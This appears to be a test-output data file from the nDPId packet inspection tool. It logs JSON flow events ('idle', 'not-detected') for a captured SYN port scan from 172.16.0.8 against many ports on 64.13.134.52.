-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 